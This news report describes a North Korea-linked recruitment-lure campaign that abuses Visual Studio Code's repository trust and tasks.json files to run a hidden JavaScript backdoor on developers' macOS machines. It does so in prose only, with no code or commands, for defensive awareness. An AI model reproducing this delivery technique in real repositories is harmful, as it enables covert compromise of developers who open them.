Threat actors linked to North Korea are continuing to evolve the long-running “Contagious Interview” campaign, introducing a previously undocumented backdoor technique that targets developers through Microsoft Visual Studio Code (VSC).
Recent analysis by Jamf Threat Labs, with supporting technical research from OpenSourceMalware, shows a steady progression toward deeper integration with legitimate development tools.
The campaign is known for using fake recruitment scenarios to lure software developers into cloning malicious Git repositories. These repositories, usually hosted on popular code-sharing platforms, are introduced as coding challenges or interview assignments.
When opened in VSC, the projects prompt users to trust the repository author, a step that enables automated processing of configuration files.
Earlier stages of the campaign relied on ClickFix-style techniques and VSC tasks.json files to execute arbitrary commands. More recent activity shows attackers expanding these methods by embedding heavily obfuscated JavaScript and, in the latest iteration, deploying a persistent backdoor implant.
Microsoft Visual Studio Code as an Initial Access Vector
In observed macOS infections, opening a malicious repository triggers a background shell process that downloads a remote JavaScript payload and executes it using the Node.js runtime. The process is designed to run independently of the VSC session and suppress visible output, making detection difficult for users.
The JavaScript payload implements core backdoor functionality, including system fingerprinting, persistent command-and-control (C2) communication, and Remote Code Execution (RCE)
Hostname, network identifiers, operating system details, and public IP address information are collected to uniquely identify each compromised system. The backdoor then beacons to a remote server at frequent intervals, awaiting additional instructions.
The researchers also observed follow-on activity several minutes after initial infection, where additional JavaScript established a more traditional backdoor with process management and cleanup capabilities. This design allows operators to deploy further tooling, execute arbitrary code, or terminate activity remotely if needed.
“This activity highlights the continued evolution of DPRK-linked threat actors, who consistently adapt their tooling and delivery mechanisms to integrate with legitimate developer workflows,” Jamf Threat Labs warned.
“Developers should remain cautious when interacting with third-party repositories, especially those shared directly or originating from unfamiliar sources. Before marking a repository as trusted in Visual Studio Code, it’s important to review its contents.”
